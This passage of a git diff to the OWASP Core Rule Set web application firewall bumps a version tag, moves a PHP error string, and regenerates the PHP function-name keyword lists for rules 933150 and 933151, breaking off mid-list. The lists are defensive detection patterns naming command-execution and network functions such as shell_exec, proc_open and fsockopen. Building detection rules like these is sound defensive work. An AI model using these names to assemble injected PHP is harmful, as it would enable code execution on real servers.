     setvar:'tx.blocking_anomaly_score=%{tx.blocking_inbound_anomaly_score}',\
     setvar:'tx.blocking_anomaly_score=+%{tx.blocking_outbound_anomaly_score}',\
     setvar:'tx.detection_anomaly_score=%{tx.detection_inbound_anomaly_score}',\
@@ -44,7 +44,7 @@ SecAction \
 (Outbound Scores: blocking=%{tx.blocking_outbound_anomaly_score}, detection=%{tx.detection_outbound_anomaly_score}, per_pl=%{tx.outbound_anomaly_score_pl1}-%{tx.outbound_anomaly_score_pl2}-%{tx.outbound_anomaly_score_pl3}-%{tx.outbound_anomaly_score_pl4}, threshold=%{tx.outbound_anomaly_score_threshold}) - \
 (SQLI=%{tx.sql_injection_score}, XSS=%{tx.xss_score}, RFI=%{tx.rfi_score}, LFI=%{tx.lfi_score}, RCE=%{tx.rce_score}, PHPI=%{tx.php_injection_score}, HTTP=%{tx.http_violation_score}, SESS=%{tx.session_fixation_score}, COMBINED_SCORE=%{tx.anomaly_score})',\
     tag:'reporting',\
-    ver:'OWASP_CRS/4.0.0-rc1'"
+    ver:'OWASP_CRS/4.0.0-rc2'"
 SecMarker "END-REPORTING"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:980011,phase:1,pass,nolog,skipAfter:END-RESPONSE-980-CORRELATION"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:980012,phase:2,pass,nolog,skipAfter:END-RESPONSE-980-CORRELATION"
diff --git a/rules/@owasp_crs/php-errors-pl2.data b/rules/@owasp_crs/php-errors-pl2.data
index 28844e3..b1d7761 100644
--- a/rules/@owasp_crs/php-errors-pl2.data
+++ b/rules/@owasp_crs/php-errors-pl2.data
@@ -1,5 +1,6 @@
 # For more information, see comments at the beginning of the php-errors.data file.
 
+File size is
 Invalid date
 Static function
 The function
diff --git a/rules/@owasp_crs/php-errors.data b/rules/@owasp_crs/php-errors.data
index 70d379e..e630ef4 100644
--- a/rules/@owasp_crs/php-errors.data
+++ b/rules/@owasp_crs/php-errors.data
@@ -1547,7 +1547,6 @@ Failed to set up data channel:
 Failed to stat
 Fatal error:
 File cached script loaded into memory '
-File size is
 Flexible array member in union at line
 Flexible array member not at end of struct at line
 Forced restart at
diff --git a/rules/@owasp_crs/php-function-names-933150.data b/rules/@owasp_crs/php-function-names-933150.data
index a04fbc4..057a690 100644
--- a/rules/@owasp_crs/php-function-names-933150.data
+++ b/rules/@owasp_crs/php-function-names-933150.data
@@ -1,44 +1,245 @@
-__halt_compiler
-apache_child_terminate
+##! File autogenerated by util/php-dictionary-gen with: -a 30 -F 90000 -s ../fp-finder/spell.sh
+array_diff_uassoc
+array_diff_ukey
+array_filter
+array_intersect_uassoc
+array_intersect_ukey
+array_key_exists
+array_map
+array_push
+array_reduce
+array_shift
+array_udiff
+array_udiff_assoc
+array_udiff_uassoc
+array_uintersect
+array_uintersect_assoc
+array_uintersect_uassoc
+array_values
 base64_decode
+base64_encode
+bson_decode
+bson_encode
 bzdecompress
+bzopen
 call_user_func
-call_user_func_array
-call_user_method
-call_user_method_array
-convert_uudecode
+class_exists
+convert_uuencode
+curl_exec
+curl_file_create
+curl_init
+debug_backtrace
+dirname
+error_reporting
+escapeshellarg
+escapeshellcmd
+exif_imagetype
+exif_read_data
+exif_tagname
+exif_thumbnail
+fclose
+file_exists
 file_get_contents
-file_put_contents
+finfo_open
+fopen
+fputs
 fsockopen
+ftp_connect
+ftp_get
+ftp_nb_get
+ftp_nb_put
+ftp_put
+function_exists
+fwrite
+get_cfg_var
+get_class
 get_class_methods
 get_class_vars
+get_current_user
 get_defined_constants
 get_defined_functions
 get_defined_vars
+get_meta_tags
+getcwd
+getenv
+getimagesize
+getlastmod
+getmygid
+getmyinode
+getmypid
+getmyuid
+gzcompress
 gzdecode
+gzdeflate
+gzencode
+gzfile
 gzinflate
+gzopen
+gzread
 gzuncompress
-include_once
-invokeargs
-pcntl_exec
-pcntl_fork
+gzwrite
+hash_file
+hash_hmac_file
+hash_update_file
+header_register_callback
+hex2bin
+highlight_file
+html_entity_decode
+htmlentities
+htmlspecialchars
+htmlspecialchars_decode
+image2wbmp
+imagecreatefromgif
+imagecreatefromjpeg
+imagecreatefrompng
+imagecreatefromwbmp
+imagecreatefromxbm
+imagecreatefromxpm
+imagegd
+imagegd2
+ini_get
+ini_get_all
+ini_set
+intval
+iptcembed
+is_array
+is_dir
+is_executable
+is_file
+is_int
+is_null
+is_numeric
+is_object
+is_readable
+is_writable
+is_writeable
+iterator_apply
+json_decode
+json_encode
+mb_ereg
+mb_ereg_match
+mb_ereg_replace
+mb_ereg_replace_callback
+mb_eregi
+mb_eregi_replace
+mb_parse_str
+md5_file
+method_exists
+mkdir
+move_uploaded_file
+mysql_query
+number_format
+ob_clean
+ob_end_clean
+ob_end_flush
+ob_flush
+ob_get_clean
+ob_get_contents
+ob_get_flush
+ob_start
+odbc_connect
+odbc_exec
+odbc_execute
+odbc_result
+odbc_result_all
+parse_ini_file
+parse_str
+parse_url
 pfsockopen
-posix_getcwd
+pg_connect
+pg_execute
+pg_prepare
+pg_query
+php_strip_whitespace
+php_uname
+phpinfo
+phpversion
+posix_getegid
+posix_geteuid
+posix_getgid
+posix_getlogin
+posix_getpwnam
 posix_getpwuid
-posix_getuid
-posix_uname
-ReflectionFunction
-require_once
+posix_kill
+posix_mkfifo
+posix_mknod
+posix_ttyname
+preg_match
+preg_match_all
+preg_replace
+preg_replace_callback
+preg_replace_callback_array
+preg_split
+print_r
+printf
+proc_close
+proc_get_status
+proc_nice
+proc_open
+proc_terminate
+putenv
+rawurldecode
+rawurlencode
+read_exif_data
+readdir
+readgzfile
+register_shutdown_function
+register_tick_function
+rename_function
+rtrim
+runkit_constant_add
+runkit_constant_redefine
+runkit_function_add
+runkit_function_copy
+runkit_function_redefine
+runkit_function_rename
+runkit_method_add
+runkit_method_copy
+runkit_method_redefine
+runkit_method_rename
+session_set_save_handler
+session_start
+set_error_handler
+set_exception_handler
+set_include_path
+set_magic_quotes_runtime
+setdefaultstub
+settype
+sha1_file
 shell_exec
-str_rot13
-sys_get_temp_dir
-wp_remote_fopen
-wp_remote_get
-wp_remote_head
-wp_remote_post
-wp_remote_request
-wp_safe_remote_get
-wp_safe_remote_head
-wp_safe_remote_post
-wp_safe_remote_request
+show_source
+simplexml_load_file
+simplexml_load_string
+socket_connect
+socket_create
+spl_autoload_register
+sqlite_array_query
+sqlite_create_aggregate
+sqlite_create_function
+sqlite_exec
+sqlite_open
+sqlite_popen
+sqlite_query
+sqlite_single_query
+sqlite_unbuffered_query
+str_replace
+stream_context_create
+stream_socket_client
+strip_tags
+stripcslashes
+stripslashes
+strlen
+strpos
+strrev
+strtolower
+strtotime
+strtoupper
+uasort
+ucfirst
+uksort
+unserialize
+urldecode
+urlencode
+usort
+var_dump
 zlib_decode
diff --git a/rules/@owasp_crs/php-function-names-933151.data b/rules/@owasp_crs/php-function-names-933151.data
index f46cbab..646ddde 100644
--- a/rules/@owasp_crs/php-function-names-933151.data
+++ b/rules/@owasp_crs/php-function-names-933151.data
@@ -1,4 +1,11 @@
-__autoload
+##! File autogenerated by util/php-dictionary-gen with: -a 30 -F 90000 -s ../fp-finder/spell.sh
+ZendTestNS2_ZendSubNS_namespaced_deprecated_func
+ZendTestNS2_ZendSubNS_namespaced_func
+ZendTestNS2_namespaced_deprecated_func
+ZendTestNS2_namespaced_func
+accel_chdir
+acos
+acosh
 addcslashes
 addslashes
 apache_child_terminate
@@ -8,7 +15,6 @@ apache_getenv
 apache_lookup_uri
 apache_note
 apache_request_headers
-apache_reset_timeout
 apache_response_headers
 apache_setenv
 array_change_key_case
@@ -19,66 +25,110 @@ array_count_values
 array_diff
 array_diff_assoc
 array_diff_key
+array_diff_uassoc
+array_diff_ukey
 array_fill
 array_fill_keys
 array_flip
 array_intersect
 array_intersect_assoc
 array_intersect_key
+array_intersect_uassoc
+array_intersect_ukey
 array_is_list
-array_key_exists
 array_key_first
 array_key_last
 array_keys
+array_map
 array_merge
 array_merge_recursive
 array_multisort
 array_pad
 array_pop
 array_product
-array_push
 array_rand
+array_reduce
 array_replace
 array_replace_recursive
 array_reverse
 array_search
-array_shift
 array_slice
 array_splice
 array_sum
+array_udiff
+array_udiff_assoc
+array_udiff_uassoc
+array_uintersect
+array_uintersect_assoc
+array_uintersect_uassoc
 array_unique
 array_unshift
-array_values
 array_walk
 array_walk_recursive
+arsort
+asinh
+asort
+assert_options
+atan
+atan2
+atanh
+base64_decode
+base64_encode
 base_convert
+bcadd
+bccomp
+bcdiv
+bcmod
+bcmul
+bcpow
+bcpowmod
+bcscale
+bcsqrt
+bcsub
 bin2hex
 bind_textdomain_codeset
+bindec
 bindtextdomain
-blenc_encrypt
 boolval
-bzclose
 bzcompress
+bzdecompress
 bzerrno
 bzerror
 bzerrstr
-bzflush
+bzopen
 bzread
-bzwrite
-calcul_hmac
-calculhmac
-chdb_create
-checkdnsrr
+cal_days_in_month
+cal_from_jd
+cal_info
+cal_to_jd
+call_user_func_array
+ceil
+chdir
 chgrp
+chmod
+chown
+chr
 chunk_split
 class_alias
-class_exists
 class_implements
 class_parents
 class_uses
 clearstatcache
-cli_get_process_title
-cli_set_process_title
+closedir
+closelog
+collator_asort
+collator_compare
+collator_create
+collator_get_attribute
+collator_get_error_code
+collator_get_error_message
+collator_get_locale
+collator_get_sort_key
+collator_get_strength
+collator_set_attribute
+collator_set_strength
+collator_sort
+collator_sort_with_sort_keys
 com_create_guid
 com_event_sink
 com_get_active_object
@@ -88,12 +138,10 @@ com_print_typeinfo
 config_get_hash
 connection_aborted
 connection_status
-convert_cyr_string
+convert_uudecode
+convert_uuencode
 count_chars
-crack_check
-crack_closedict
-crack_getlastmessage
-crack_opendict
+crc32
 ctype_alnum
 ctype_alpha
 ctype_cntrl
@@ -110,7 +158,10 @@ curl_copy_handle
 curl_errno
 curl_error
 curl_escape
+curl_exec
+curl_file_create
 curl_getinfo
+curl_init
 curl_multi_add_handle
 curl_multi_close
 curl_multi_errno
@@ -162,37 +213,107 @@ date_timestamp_get
 date_timestamp_set
 date_timezone_get
 date_timezone_set
+datefmt_create
+datefmt_format
+datefmt_format_object
+datefmt_get_calendar
+datefmt_get_calendar_object
+datefmt_get_datetype
+datefmt_get_error_code
+datefmt_get_error_message
+datefmt_get_locale
+datefmt_get_pattern
+datefmt_get_timetype
+datefmt_get_timezone
+datefmt_get_timezone_id
+datefmt_is_lenient
+datefmt_localtime
+datefmt_parse
+datefmt_set_calendar
+datefmt_set_lenient
+datefmt_set_pattern
+datefmt_set_timezone
+dba_close
+dba_delete
+dba_exists
+dba_fetch
+dba_firstkey
+dba_handlers
+dba_insert
+dba_key_split
+dba_list
+dba_nextkey
+dba_open
+dba_optimize
+dba_popen
+dba_replace
+dba_sync
 dcgettext
 dcngettext
+debug_backtrace
 debug_print_backtrace
 debug_zval_dump
 decbin
 dechex
-define_syslog_variables
+deflate_add
+deflate_init
 deg2rad
 dgettext
 disk_free_space
 disk_total_space
+dl_test_test1
+dl_test_test2
 dngettext
 dns_check_record
 dns_get_mx
 dns_get_record
 dom_import_simplexml
-ereg_replace
-eregi_replace
+easter_date
+easter_days
+enchant_broker_describe
+enchant_broker_dict_exists
+enchant_broker_free
+enchant_broker_free_dict
+enchant_broker_get_dict_path
+enchant_broker_get_error
+enchant_broker_init
+enchant_broker_list_dicts
+enchant_broker_request_dict
+enchant_broker_request_pwl_dict
+enchant_broker_set_dict_path
+enchant_broker_set_ordering
+enchant_dict_add
+enchant_dict_add_to_session
+enchant_dict_check
+enchant_dict_describe
+enchant_dict_get_error
+enchant_dict_is_added
+enchant_dict_quick_check
+enchant_dict_store_replacement
+enchant_dict_suggest
+enum_exists
 error_clear_last
 error_get_last
-expect_expectl
-expect_popen
+error_log
+error_reporting
+escapeshellarg
+escapeshellcmd
+exif_imagetype
+exif_read_data
+exif_tagname
+exif_thumbnail
 expm1
 extension_loaded
-ezmlm_hash
 fastcgi_finish_request
 fdatasync
+fdiv
+feof
+ffi_trampoline
 fflush
 fgetc
 fgetcsv
-fgetss
+fgets
+file_put_contents
 filter_has_var
 filter_id
 filter_input
@@ -200,27 +321,69 @@ filter_input_array
 filter_list
 filter_var
 filter_var_array
+finfo_buffer
 finfo_close
 finfo_file
+finfo_open
 finfo_set_flags
+floatval
+fmod
 fnmatch
-foreach
 forward_static_call
 forward_static_call_array
 fpassthru
+fpm_get_status
 fprintf
 fputcsv
+fread
 frenchtojd
-fribidi_log2vis
 fscanf
 fseek
+fsockopen
+fstat
 fsync
+ftell
+ftok
+ftp_alloc
 ftp_append
+ftp_cdup
+ftp_chdir
+ftp_chmod
+ftp_close
+ftp_connect
+ftp_delete
+ftp_exec
+ftp_fget
+ftp_fput
+ftp_get
+ftp_get_option
+ftp_login
+ftp_mdtm
+ftp_mkdir
+ftp_mlsd
+ftp_nb_continue
+ftp_nb_fget
+ftp_nb_fput
+ftp_nb_get
+ftp_nb_put
+ftp_nlist
+ftp_pasv
+ftp_put
+ftp_pwd
+ftp_raw
+ftp_rawlist
+ftp_rename
+ftp_rmdir
+ftp_set_option
+ftp_site
+ftp_size
 ftp_ssl_connect
+ftp_systype
 ftruncate
 func_get_arg
 func_get_args
 func_num_args
+fwrite
 gc_collect_cycles
 gc_disable
 gc_enable
@@ -230,68 +393,156 @@ gc_status
 gd_info
 get_browser
 get_called_class
-get_class
+get_cfg_var
+get_class_methods
+get_class_vars
+get_current_user
+get_debug_type
 get_declared_classes
 get_declared_interfaces
 get_declared_traits
+get_defined_constants
+get_defined_functions
+get_defined_vars
 get_extension_funcs
 get_headers
 get_html_translation_table
 get_include_path
 get_included_files
 get_loaded_extensions
-get_magic_quotes_gpc
-get_magic_quotes_runtime
+get_mangled_object_vars
+get_meta_tags
 get_object_vars
+get_open_basedir
 get_parent_class
-get_required_files
+get_resource_id
 get_resource_type
 get_resources
-getallheaders
+getcwd
+getdate
+getenv
 gethostbyaddr
 gethostbyname
 gethostbynamel
 gethostname
+getimagesize
 getimagesizefromstring
-getmxrr
+getlastmod
+getmygid
+getmyinode
+getmypid
+getmyuid
 getopt
 getprotobyname
 getprotobynumber
-getrandmax
 getrusage
 getservbyname
 getservbyport
+gettext
 gettimeofday
+gettype
+gmdate
 gmmktime
+gmp_abs
+gmp_add
+gmp_and
+gmp_binomial
+gmp_clrbit
+gmp_cmp
+gmp_com
+gmp_div_q
+gmp_div_qr
+gmp_div_r
+gmp_divexact
+gmp_export
+gmp_fact
+gmp_gcd
+gmp_gcdext
+gmp_hamdist
+gmp_import
+gmp_init
+gmp_intval
+gmp_invert
+gmp_jacobi
+gmp_kronecker
+gmp_lcm
+gmp_legendre
+gmp_mod
+gmp_mul
+gmp_neg
+gmp_nextprime
+gmp_or
+gmp_perfect_power
+gmp_perfect_square
+gmp_popcount
+gmp_pow
+gmp_powm
+gmp_prob_prime
+gmp_random_bits
+gmp_random_range
+gmp_random_seed
+gmp_root
+gmp_rootrem
+gmp_scan0
+gmp_scan1
+gmp_setbit
+gmp_sign
+gmp_sqrt
+gmp_sqrtrem
+gmp_strval
+gmp_sub
+gmp_testbit
+gmp_xor
 gmstrftime
-gopher_parsedir
+grapheme_extract
+grapheme_stripos
+grapheme_stristr
+grapheme_strlen
+grapheme_strpos
+grapheme_strripos
+grapheme_strrpos
+grapheme_strstr
+grapheme_substr
 gregoriantojd
-gzclose
-gzeof
-gzgetc
-gzgets
-gzgetss
-gzpassthru
-gzputs
-gzrewind
-gzseek
-gztell
+gzcompress
+gzdecode
+gzdeflate
+gzencode
+gzfile
+gzinflate
+gzopen
+gzuncompress
 hash_algos
 hash_copy
 hash_equals
+hash_file
 hash_final
+hash_hkdf
 hash_hmac
+hash_hmac_algos
+hash_hmac_file
 hash_init
 hash_pbkdf2
 hash_update
+hash_update_file
 hash_update_stream
+header_register_callback
 header_remove
-hebrevc
+headers_list
+headers_sent
+hebrev
+hex2bin
 hexdec
+highlight_file
 highlight_string
 hrtime
+html_entity_decode
+htmlentities
+htmlspecialchars_decode
 http_build_query
 http_response_code
+hypot
+iconv
 iconv_get_encoding
 iconv_mime_decode
 iconv_mime_decode_headers
@@ -306,23 +557,292 @@ idn_to_utf8
 ignore_user_abort
 image_type_to_extension
 image_type_to_mime_type
-import_request_variables
+imageaffine
+imageaffinematrixconcat
+imageaffinematrixget
+imagealphablending
+imageantialias
+imagearc
+imageavif
+imagebmp
+imagechar
+imagecharup
+imagecolorallocate
+imagecolorallocatealpha
+imagecolorat
+imagecolorclosest
+imagecolorclosestalpha
+imagecolorclosesthwb
+imagecolordeallocate
+imagecolorexact
+imagecolorexactalpha
+imagecolormatch
+imagecolorresolve
+imagecolorresolvealpha
+imagecolorset
+imagecolorsforindex
+imagecolorstotal
+imagecolortransparent
+imageconvolution
+imagecopy
+imagecopymerge
+imagecopymergegray
+imagecopyresampled
+imagecopyresized
+imagecreate
+imagecreatefromavif
+imagecreatefrombmp
+imagecreatefromgd
+imagecreatefromgd2
+imagecreatefromgd2part
+imagecreatefromgif
+imagecreatefromjpeg
+imagecreatefrompng
+imagecreatefromstring
+imagecreatefromtga
+imagecreatefromwbmp
+imagecreatefromwebp
+imagecreatefromxbm
+imagecreatefromxpm
+imagecreatetruecolor
+imagecrop
+imagecropauto
+imagedashedline
+imagedestroy
+imageellipse
+imagefill
+imagefilledarc
+imagefilledellipse
+imagefilledpolygon
+imagefilledrectangle
+imagefilltoborder
+imagefilter
+imageflip
+imagefontheight
+imagefontwidth
+imageftbbox
+imagefttext
+imagegammacorrect
+imagegd
+imagegd2
+imagegetclip
+imagegetinterpolation
+imagegif
+imagegrabscreen
+imagegrabwindow
+imageinterlace
+imageistruecolor
+imagejpeg
+imagelayereffect
+imageline
+imageloadfont
+imageopenpolygon
+imagepalettecopy
+imagepalettetotruecolor
+imagepng
+imagepolygon
+imagerectangle
+imageresolution
+imagerotate
+imagesavealpha
+imagescale
+imagesetbrush
+imagesetclip
+imagesetinterpolation
+imagesetpixel
+imagesetstyle
+imagesetthickness
+imagesettile
+imagestring
+imagestringup
+imagesx
+imagesy
+imagetruecolortopalette
+imagetypes
+imagewbmp
+imagewebp
+imagexbm
+imap_8bit
+imap_alerts
+imap_append
+imap_base64
+imap_binary
+imap_body
+imap_bodystruct
+imap_check
+imap_clearflag_full
+imap_close
+imap_createmailbox
+imap_delete
+imap_deletemailbox
+imap_errors
+imap_expunge
+imap_fetch_overview
+imap_fetchbody
+imap_fetchheader
+imap_fetchmime
+imap_fetchstructure
+imap_gc
+imap_get_quota
+imap_get_quotaroot
+imap_getacl
+imap_getmailboxes
+imap_getsubscribed
+imap_headerinfo
+imap_headers
+imap_is_open
+imap_last_error
+imap_list
+imap_listscan
+imap_lsub
+imap_mail
+imap_mail_compose
+imap_mail_copy
+imap_mail_move
+imap_mailboxmsginfo
+imap_mime_header_decode
+imap_msgno
+imap_mutf7_to_utf8
+imap_num_msg
+imap_num_recent
+imap_open
+imap_ping
+imap_qprint
+imap_renamemailbox
+imap_reopen
+imap_rfc822_parse_adrlist
+imap_rfc822_parse_headers
+imap_rfc822_write_address
+imap_savebody
+imap_search
+imap_set_quota
+imap_setacl
+imap_setflag_full
+imap_sort
+imap_status
+imap_subscribe
+imap_thread
+imap_timeout
+imap_uid
+imap_undelete
+imap_unsubscribe
+imap_utf7_decode
+imap_utf7_encode
+imap_utf8
+imap_utf8_to_mutf7
 in_array
 inet_ntop
 inet_pton
-ini_alter
+inflate_add
+inflate_get_read_len
+inflate_get_status
+inflate_init
+ini_get
+ini_get_all
 ini_parse_quantity
 ini_restore
+ini_set
+intdiv
 interface_exists
 intl_error_name
 intl_get_error_code
 intl_get_error_message
 intl_is_failure
+intlcal_add
+intlcal_after
+intlcal_before
+intlcal_clear
+intlcal_create_instance
+intlcal_equals
+intlcal_field_difference
+intlcal_from_date_time
+intlcal_get
+intlcal_get_actual_maximum
+intlcal_get_actual_minimum
+intlcal_get_available_locales
+intlcal_get_day_of_week_type
+intlcal_get_error_code
+intlcal_get_error_message
+intlcal_get_first_day_of_week
+intlcal_get_greatest_minimum
+intlcal_get_keyword_values_for_locale
+intlcal_get_least_maximum
+intlcal_get_locale
+intlcal_get_maximum
+intlcal_get_minimal_days_in_first_week
+intlcal_get_minimum
+intlcal_get_now
+intlcal_get_repeated_wall_time_option
+intlcal_get_skipped_wall_time_option
+intlcal_get_time
+intlcal_get_time_zone
+intlcal_get_type
+intlcal_get_weekend_transition
+intlcal_in_daylight_time
+intlcal_is_equivalent_to
+intlcal_is_lenient
+intlcal_is_set
+intlcal_is_weekend
+intlcal_roll
+intlcal_set
+intlcal_set_first_day_of_week
+intlcal_set_lenient
+intlcal_set_minimal_days_in_first_week
+intlcal_set_repeated_wall_time_option
+intlcal_set_skipped_wall_time_option
+intlcal_set_time
+intlcal_set_time_zone
+intlcal_to_date_time
+intlgregcal_create_instance
+intlgregcal_get_gregorian_change
+intlgregcal_is_leap_year
+intlgregcal_set_gregorian_change
+intltz_count_equivalent_ids
+intltz_create_default
+intltz_create_enumeration
+intltz_create_time_zone
+intltz_create_time_zone_id_enumeration
+intltz_from_date_time_zone
+intltz_get_canonical_id
+intltz_get_display_name
+intltz_get_dst_savings
+intltz_get_equivalent_id
+intltz_get_error_code
+intltz_get_error_message
+intltz_get_gmt
+intltz_get_id
+intltz_get_id_for_windows_id
+intltz_get_offset
+intltz_get_raw_offset
+intltz_get_region
+intltz_get_tz_data_version
+intltz_get_unknown
+intltz_get_windows_id
+intltz_has_same_rules
+intltz_to_date_time_zone
+intltz_use_daylight_time
 ip2long
 iptcembed
 iptcparse
+is_bool
+is_callable
+is_countable
+is_executable
+is_file
+is_finite
+is_float
+is_infinite
+is_iterable
+is_link
+is_nan
+is_readable
+is_resource
+is_scalar
+is_soap_fault
+is_string
 is_subclass_of
 is_uploaded_file
+is_writable
 iterator_apply
 iterator_count
 iterator_to_array
@@ -334,31 +854,110 @@ jdtojewish
 jdtojulian
 jdtounix
 jewishtojd
-jpeg2wbmp
 json_last_error
 json_last_error_msg
-judy_type
-judy_version
+json_validate
 juliantojd
-key_exists
 krsort
+ksort
+lcfirst
 lcg_value
 lchgrp
 lchown
+ldap_8859_to_t61
+ldap_add
+ldap_add_ext
+ldap_bind
+ldap_bind_ext
+ldap_compare
+ldap_connect
+ldap_connect_wallet
+ldap_count_entries
+ldap_count_references
+ldap_delete
+ldap_delete_ext
+ldap_dn2ufn
+ldap_err2str
+ldap_errno
+ldap_error
+ldap_escape
+ldap_exop
+ldap_exop_passwd
+ldap_exop_refresh
+ldap_exop_sync
+ldap_exop_whoami
+ldap_explode_dn
+ldap_first_attribute
+ldap_first_entry
+ldap_first_reference
+ldap_free_result
+ldap_get_attributes
+ldap_get_dn
+ldap_get_entries
+ldap_get_option
+ldap_get_values_len
+ldap_list
+ldap_mod_add
+ldap_mod_add_ext
+ldap_mod_del
+ldap_mod_del_ext
+ldap_mod_replace
+ldap_mod_replace_ext
+ldap_modify_batch
+ldap_next_attribute
+ldap_next_entry
+ldap_next_reference
+ldap_parse_exop
+ldap_parse_reference
+ldap_parse_result
+ldap_read
+ldap_rename
+ldap_rename_ext
+ldap_sasl_bind
+ldap_search
+ldap_set_option
+ldap_set_rebind_proc
+ldap_start_tls
+ldap_t61_to_8859
+ldap_unbind
+levenshtein
 libxml_clear_errors
 libxml_disable_entity_loader
-libxml_get_external_entity_loader
 libxml_get_errors
+libxml_get_external_entity_loader
 libxml_get_last_error
 libxml_set_external_entity_loader
 libxml_set_streams_context
 libxml_use_internal_errors
+linkinfo
+litespeed_finish_request
+litespeed_request_headers
+litespeed_response_headers
+locale_accept_from_http
+locale_canonicalize
+locale_compose
+locale_filter_matches
+locale_get_all_variants
+locale_get_default
+locale_get_display_language
+locale_get_display_name
+locale_get_display_region
+locale_get_display_script
+locale_get_display_variant
+locale_get_keywords
+locale_get_primary_language
+locale_get_region
+locale_get_script
+locale_lookup
+locale_parse
+locale_set_default
 localeconv
+localtime
+log10
+log1p
 long2ip
-lzf_compress
-lzf_decompress
-lzf_optimized_for
-magic_quotes_runtime
+lstat
+ltrim
 mb_check_encoding
 mb_chr
 mb_convert_case
@@ -372,6 +971,10 @@ mb_detect_order
 mb_encode_mimeheader
 mb_encode_numericentity
 mb_encoding_aliases
+mb_ereg
+mb_ereg_match
+mb_ereg_replace
+mb_ereg_replace_callback
 mb_ereg_search
 mb_ereg_search_getpos
 mb_ereg_search_getregs
@@ -379,6 +982,8 @@ mb_ereg_search_init
 mb_ereg_search_pos
 mb_ereg_search_regs
 mb_ereg_search_setpos
+mb_eregi
+mb_eregi_replace
 mb_get_info
 mb_http_input
 mb_http_output
@@ -387,12 +992,15 @@ mb_language
 mb_list_encodings
 mb_ord
 mb_output_handler
+mb_parse_str
 mb_preferred_mime_name
 mb_regex_encoding
 mb_regex_set_options
 mb_scrub
 mb_send_mail
 mb_split
+mb_str_pad
+mb_str_split
 mb_strcut
 mb_strimwidth
 mb_stripos
@@ -407,70 +1015,24 @@ mb_strstr
 mb_strtolower
 mb_strtoupper
 mb_strwidth
-mb_str_split
 mb_substitute_character
 mb_substr
 mb_substr_count
-mbereg_match
-mbereg_replace
-mbereg_search
-mbereg_search_getpos
-mbereg_search_getregs
-mbereg_search_init
-mbereg_search_pos
-mbereg_search_regs
-mbereg_search_setpos
-mberegi
-mberegi_replace
-mbregex_encoding
-mcrypt_cbc
-mcrypt_cfb
-mcrypt_create_iv
-mcrypt_decrypt
-mcrypt_ecb
-mcrypt_enc_get_algorithms_name
-mcrypt_enc_get_block_size
-mcrypt_enc_get_iv_size
-mcrypt_enc_get_key_size
-mcrypt_enc_get_modes_name
-mcrypt_enc_get_supported_key_sizes
-mcrypt_enc_is_block_algorithm
-mcrypt_enc_is_block_algorithm_mode
-mcrypt_enc_is_block_mode
-mcrypt_enc_self_test
-mcrypt_encrypt
-mcrypt_generic
-mcrypt_generic_deinit
-mcrypt_generic_end
-mcrypt_generic_init
-mcrypt_get_block_size
-mcrypt_get_cipher_name
-mcrypt_get_iv_size
-mcrypt_get_key_size
-mcrypt_list_algorithms
-mcrypt_list_modes
-mcrypt_module_close
-mcrypt_module_get_algo_block_size
-mcrypt_module_get_algo_key_size
-mcrypt_module_get_supported_key_sizes
-mcrypt_module_is_block_algorithm
-mcrypt_module_is_block_algorithm_mode
-mcrypt_module_is_block_mode
-mcrypt_module_open
-mcrypt_module_self_test
-mcrypt_ofb
-mdecrypt_generic
-memcache_debug
+md5_file
 memory_get_peak_usage
 memory_get_usage
 memory_reset_peak_usage
+metaphone
+mhash
 mhash_count
 mhash_get_block_size
 mhash_get_hash_name
 mhash_keygen_s2k
+microtime
 mime_content_type
+mkdir
 mktime
-money_format
+move_uploaded_file
 msg_get_queue
 msg_queue_exists
 msg_receive
@@ -478,174 +1040,239 @@ msg_remove_queue
 msg_send
 msg_set_queue
 msg_stat_queue
-mssql_bind
-mssql_close
-mssql_connect
-mssql_data_seek
-mssql_execute
-mssql_fetch_array
-mssql_fetch_assoc
-mssql_fetch_batch
-mssql_fetch_field
-mssql_fetch_object
-mssql_fetch_row
-mssql_field_length
-mssql_field_name
-mssql_field_seek
-mssql_field_type
-mssql_free_result
-mssql_free_statement
-mssql_get_last_message
-mssql_guid_string
-mssql_init
-mssql_min_error_severity
-mssql_min_message_severity
-mssql_next_result
-mssql_num_fields
-mssql_num_rows
-mssql_pconnect
-mssql_query
-mssql_result
-mssql_rows_affected
-mssql_select_db
+msgfmt_create
+msgfmt_format
+msgfmt_format_message
+msgfmt_get_error_code
+msgfmt_get_error_message
+msgfmt_get_locale
+msgfmt_get_pattern
+msgfmt_parse
+msgfmt_parse_message
+msgfmt_set_pattern
 mt_getrandmax
 mt_rand
 mt_srand
-mysql_affected_rows
-mysql_client_encoding
-mysql_close
-mysql_connect
-mysql_create_db
-mysql_createdb
-mysql_data_seek
-mysql_db_name
-mysql_db_query
-mysql_dbname
-mysql_drop_db
-mysql_dropdb
-mysql_errno
-mysql_error
-mysql_escape_string
-mysql_fetch_array
-mysql_fetch_assoc
-mysql_fetch_field
-mysql_fetch_lengths
-mysql_fetch_object
-mysql_fetch_row
-mysql_field_flags
-mysql_field_len
-mysql_field_name
-mysql_field_seek
-mysql_field_table
-mysql_field_type
-mysql_fieldflags
-mysql_fieldlen
-mysql_fieldname
-mysql_fieldtable
-mysql_fieldtype
-mysql_free_result
-mysql_freeresult
-mysql_get_client_info
-mysql_get_host_info
-mysql_get_proto_info
-mysql_get_server_info
-mysql_info
-mysql_insert_id
-mysql_list_dbs
-mysql_list_fields
-mysql_list_processes
-mysql_list_tables
-mysql_listdbs
-mysql_listfields
-mysql_listtables
-mysql_num_fields
-mysql_num_rows
-mysql_numfields
-mysql_numrows
-mysql_pconnect
-mysql_ping
-mysql_real_escape_string
-mysql_result
-mysql_select_db
-mysql_selectdb
-mysql_set_charset
-mysql_stat
-mysql_table_name
-mysql_tablename
-mysql_thread_id
-mysql_unbuffered_query
-mysqli_bind_param
-mysqli_bind_result
-mysqli_client_encoding
+mysqli_affected_rows
+mysqli_autocommit
+mysqli_begin_transaction
+mysqli_change_user
+mysqli_character_set_name
+mysqli_close
+mysqli_commit
 mysqli_connect
-mysqli_disable_rpl_parse
-mysqli_enable_reads_from_master
-mysqli_enable_rpl_parse
-mysqli_escape_string
-mysqli_execute
+mysqli_connect_errno
+mysqli_connect_error
+mysqli_data_seek
+mysqli_debug
+mysqli_dump_debug_info
+mysqli_errno
+mysqli_error
+mysqli_error_list
 mysqli_execute_query
-mysqli_fetch
-mysqli_get_cache_stats
+mysqli_fetch_all
+mysqli_fetch_array
+mysqli_fetch_assoc
+mysqli_fetch_column
+mysqli_fetch_field
+mysqli_fetch_field_direct
+mysqli_fetch_fields
